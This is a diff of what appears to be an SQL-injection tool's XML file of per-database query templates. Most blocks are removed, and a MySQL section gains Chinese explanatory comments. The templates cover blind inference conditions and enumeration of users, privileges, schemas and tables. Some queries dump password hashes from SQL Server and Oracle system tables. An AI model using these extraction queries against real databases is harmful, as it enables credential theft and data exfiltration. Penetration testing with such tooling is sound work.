-            <blind query="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
         </privileges>
-        <roles/>
-        <statements>
-            <inband query="SELECT query FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
-            <blind query="SELECT DISTINCT(query) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(query)) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
-        </statements>
-        <dbs>
-            <inband query="SELECT DISTINCT(schemaname) FROM pg_tables"/>
-            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT schemaname,tablename FROM pg_tables" condition="schemaname" query2="SELECT table_schema,table_name FROM information_schema.tables" condition2="table_schema"/>
-            <blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' ORDER BY tablename OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'" query2="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' OFFSET %d LIMIT 1" count2="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT attname,typname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname" condition="attname"/>
-            <blind query="SELECT attname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname" query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s' ORDER BY attname" count="SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schemaname FROM pg_tables WHERE %s" condition="schemaname"/>
-            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s" condition="schemaname"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT schemaname,tablename FROM pg_tables WHERE %s" condition="tablename" condition2="schemaname"/>
-            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s" query2="SELECT tablename FROM pg_tables WHERE schemaname='%s'" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s" count2="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'" condition="tablename" condition2="schemaname"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT nspname,relname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" condition="attname" condition2="nspname" condition3="relname"/>
-            <blind query="SELECT DISTINCT(nspname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" query2="SELECT DISTINCT(relname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" count="SELECT COUNT(DISTINCT(nspname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" count2="SELECT COUNT(DISTINCT(relname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'" condition="attname" condition2="nspname" condition3="relname"/>
-        </search_column>
-    </dbms>
 
-    <dbms value="Microsoft SQL Server">
-        <cast query="CAST(%s AS NVARCHAR(4000))"/>
-        <length query="LTRIM(STR(LEN(%s)))"/>
-        <isnull query="ISNULL(%s,' ')"/>
-        <delimiter query="+"/>
-        <limit query="SELECT TOP %d "/>
-        <limitregexp query="TOP\s+([\d]+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+?\s+NOT\s+IN\s+\(SELECT\s+TOP\s+([\d]+)\s+"/>
-        <limitgroupstart query="2"/>
-        <limitgroupstop query="1"/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*"/>
-        <substring query="SUBSTRING((%s),%d,%d)"/>
-        <concatenate query="%s+%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <hex query="master.dbo.fn_varbintohexstr(CAST(%s AS VARBINARY(8000)))"/>
-        <inference query="UNICODE(SUBSTRING((%s),%d,1))>%d"/>
-        <banner query="SELECT @@VERSION"/>
-        <current_user query="SELECT SYSTEM_USER"/>
-        <current_db query="SELECT DB_NAME()"/>
-        <hostname query="@@SERVERNAME"/>
-        <table_comment query="SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s',NULL,NULL)"/>
-        <column_comment query="SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s','column','%s')"/>
-        <is_dba query="IS_SRVROLEMEMBER('sysadmin')=1" query2="IS_SRVROLEMEMBER('sysadmin','%s')=1"/>
-        <users>
-            <inband query="SELECT name FROM master..syslogins" query2="SELECT name FROM sys.sql_logins"/>
-            <!-- NOTE: in NOT IN kind of queries ORDER BY is a must -->
-            <blind query="SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins ORDER BY name) ORDER BY name" query2="SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins" count2="SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins"/>
-        </users>
-        <passwords>
-            <inband query="SELECT name,master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name,master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
-            <blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s' ORDER BY password) ORDER BY password" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password_hash NOT IN (SELECT TOP %d password_hash FROM sys.sql_logins WHERE name='%s' ORDER BY password_hash) ORDER BY password_hash" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
-        </passwords>
-        <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
-        <privileges/>
-        <roles/>
-        <statements>
-            <inband query="SELECT st.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
-            <blind query="SELECT TOP 1 a.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) a WHERE a.text NOT IN (SELECT TOP %d b.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) b ORDER BY b.text) ORDER BY a.text" count="SELECT LTRIM(STR(COUNT(st.text))) FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
-        </statements>
-        <dbs>
-            <inband query="SELECT name FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/>
-            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name AS table_name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT name FROM %s..sysobjects WHERE xtype='U'"/>
-            <blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')" query2="SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name" count2="SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'" query3="SELECT TOP 1 name FROM %s..sysobjects WHERE xtype='U' AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype='U' ORDER BY name) ORDER BY name" count3="SELECT COUNT(name) FROM %s..sysobjects WHERE xtype='U'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) AS type_name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query2="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" condition="[DB]..syscolumns.name"/>
-            <blind query="SELECT TOP 1 %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' AND %s..syscolumns.name NOT IN (SELECT TOP %d %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' ORDER BY %s..syscolumns.name) ORDER BY %s..syscolumns.name" query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" query3="SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')" condition="[DB]..syscolumns.name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS CAP FROM %s)x WHERE CAP=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
-            <blind query="SELECT name FROM master..sysdatabases WHERE %s" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases WHERE %s" condition="name"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') AND " condition="name" condition2="name"/>
-            <blind query="SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') " count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')" condition="name" condition2="name"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
-            <blind query="SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" count="SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')" condition="[DB]..syscolumns.name" condition2="[DB]..sysobjects.name"/>
-        </search_column>
-    </dbms>
 
-    <dbms value="Oracle">
-        <cast query="CAST(%s AS VARCHAR(4000))"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="NVL(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="ROWNUM AS CAP %s) WHERE CAP"/>
-        <limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
-        <limitgroupstart/>
-        <limitgroupstop/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <substring query="SUBSTRC((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <hex query="RAWTOHEX(%s)"/>
-        <!--
-        NOTE: ASCIISTR (https://www.techonthenet.com/oracle/functions/asciistr.php)
-        -->
-        <inference query="ASCII(SUBSTRC((%s),%d,1))>%d"/>
-        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
-        <current_user query="SELECT USER FROM DUAL"/>
-        <!--
-        NOTE: current physical DB but not usable for enumeration
-        <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
-        -->
-        <current_db query="SELECT USER FROM DUAL"/>
-        <!--
-             NOTE: in Oracle to check if the session user is DBA you can use:
-             SELECT USERENV('ISDBA') FROM DUAL
-        -->
-        <hostname query="SELECT UTL_INADDR.GET_HOST_NAME FROM DUAL"/>
-        <table_comment query="SELECT COMMENTS FROM ALL_TAB_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s'"/>
-        <column_comment query="SELECT COMMENTS FROM ALL_COL_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s' AND COLUMN_NAME='%s'"/>
-        <is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
-        <users>
-            <inband query="SELECT USERNAME FROM SYS.ALL_USERS"/>
-            <blind query="SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS CAP FROM SYS.ALL_USERS) WHERE CAP=%d" count="SELECT COUNT(USERNAME) FROM SYS.ALL_USERS"/>
-        </users>
-        <passwords>
-            <inband query="SELECT NAME,PASSWORD FROM SYS.USER$" condition="NAME"/>
-            <blind query="SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS CAP FROM SYS.USER$ WHERE NAME='%s') WHERE CAP=%d" count="SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'"/>
-        </passwords>
-        <!--
-             NOTE: in Oracle to enumerate the privileges for the session user you can use:
-             SELECT * FROM SESSION_PRIVS
-        -->
-        <privileges>
-            <inband query="SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS CAP FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
-        </privileges>
-        <!--
-             NOTE: in Oracle to enumerate the roles for the session user you can use:
-             SELECT * FROM SESSION_ROLES
-        -->
-        <roles>
-            <inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
-            <blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE CAP=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS CAP FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE CAP=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
-        </roles>
-        <statements>
-            <inband query="SELECT SQL_TEXT FROM V$SQL"/>
-            <blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS CAP FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE CAP=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
-        </statements>
-        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
-        <dbs>
-            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
-            <blind query="SELECT OWNER FROM (SELECT OWNER,ROWNUM AS CAP FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE CAP=%d" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES" condition="OWNER"/>
-            <blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS CAP FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE CAP=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
-            <blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s ORDER BY ROWNUM"/>
-            <blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS CAP FROM %s qq ORDER BY ROWNUM) WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
-        <search_db>
-            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s" condition="OWNER"/>
-            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s" condition="OWNER"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE %s" condition="TABLE_NAME" condition2="OWNER"/>
-            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES WHERE %s)" query2="SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s')" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TABLES WHERE OWNER='%s'" condition="TABLE_NAME" condition2="OWNER"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT OWNER,TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE %s" condition="COLUMN_NAME" condition2="OWNER" condition3="TABLE_NAME"/>
-            <blind query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TAB_COLUMNS WHERE %s)" query2="SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s')" count="SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TAB_COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s'" condition="COLUMN_NAME" condition2="OWNER" condition3="TABLE_NAME"/>
-        </search_column>
-    </dbms>
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
 
-    <dbms value="SQLite">
-        <cast query="CAST(%s AS TEXT)" dbms_version="&gt;=3.0"/>
-        <!-- NOTE: On SQLite version 2 everything is stored as a string (Reference: http://www.mono-project.com/SQLite) -->
-        <length query="LENGTH(%s)"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
         <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
         <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
         <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
         <limitgroupstop query="2"/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
         <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
-        <comment query="--" query2="/*"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
         <hex query="HEX(%s)"/>
-        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
-        <banner query="SELECT SQLITE_VERSION()"/>
-        <current_user/>
-        <current_db/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba/>
-        <check_udf/>
-        <users/>
-        <passwords/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <dbs/>
-        <tables>
-            <inband query="SELECT tbl_name FROM sqlite_master WHERE type='table'"/>
-            <blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT MAX(sql) FROM sqlite_master WHERE type='table' AND tbl_name='%s'"/>
-            <blind query="SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='%s' LIMIT 1" condition=""/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT %s FROM %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <search_db/>
-        <search_table>
-            <inband query="SELECT tbl_name FROM sqlite_master WHERE type='table' AND %s" condition="tbl_name" condition2=""/>
-            <blind query="" query2="SELECT tbl_name FROM sqlite_master WHERE type='table'" count="" count2="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'" condition="tbl_name" condition2=""/>
-        </search_table>
-        <search_column/>
-    </dbms>
-
-    <dbms value="Microsoft Access">
-        <cast query="RTRIM(CVAR(%s))"/>
-        <length query="LEN(RTRIM(CVAR(%s)))"/>
-        <isnull query="IIF(LEN(%s)=0,' ',%s)"/>
-        <delimiter query="&amp;"/>
-        <limit query="TOP %d"/>
-        <limitregexp query="\s+TOP\s+([\d]+)"/>
-        <limitgroupstart query="1"/>
-        <limitgroupstop query="1"/>
-        <limitstring query=" TOP "/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="%16" query2="%00"/>
-        <substring query="MID((%s),%d,%d)"/>
-        <concatenate query="%s&amp;%s"/>
-        <case query="SELECT (IIF(%s,1,0))"/>
-        <inference query="ASCW(MID((%s),%d,1))>%d"/>
-        <banner/>
-        <!--CURRENTUSER() is not available outside the MS Access query tool itself-->
-        <current_user/>
-        <current_db/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba/>
-        <dbs/>
-        <!--MSysObjects have no read permission by default-->
-        <tables>
-            <inband query="SELECT Name FROM MSysObjects WHERE Type=1"/>
-            <blind query="SELECT MIN(Name) FROM MSysObjects WHERE Type=1 AND Name>'%s'" count="SELECT COUNT(Name) FROM MSysObjects WHERE Type=1"/>
-        </tables>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CVAR(%s)>'%s'" query2="SELECT TOP 1 %s FROM %s WHERE CVAR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s)"/>
-        </dump_table>
-        <users/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <search_db/>
-        <search_table/>
-        <search_column/>
-   </dbms>
-
